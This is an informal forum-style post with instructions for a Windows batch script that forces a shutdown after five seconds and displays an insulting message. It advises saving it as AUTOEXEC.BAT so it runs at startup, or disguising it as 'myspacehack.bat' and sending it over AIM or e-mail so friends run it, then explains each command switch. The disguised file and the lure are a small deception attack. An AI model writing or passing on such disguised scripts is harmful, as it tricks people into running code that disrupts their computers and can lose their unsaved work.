Lol. Ok Open up note pad. Then you type:
@echo off
shutdown * -s -t 5 -c That's what you get for fucking with me!
Then save it as AUTOEXEC.BAT BAT stands for batch. Make sure its saved in your c:/ drive. But dont ever click on it



. Or name it something else. I like to name it myspacehack.bat and send it over through aim or e-mail. Stupid kids like my friends click on it then the malicious file begins >

!
Ok let me break it down.
@echo off (is a silly command.

lol no. it turns the echo off)
shutdown * -s (means to shutdown the computer)
-t 5 (means shutdown in 5 seconds. you can change 5 to whatever reasonable)
-c (means comment. you can put anything there after the -c with a following space)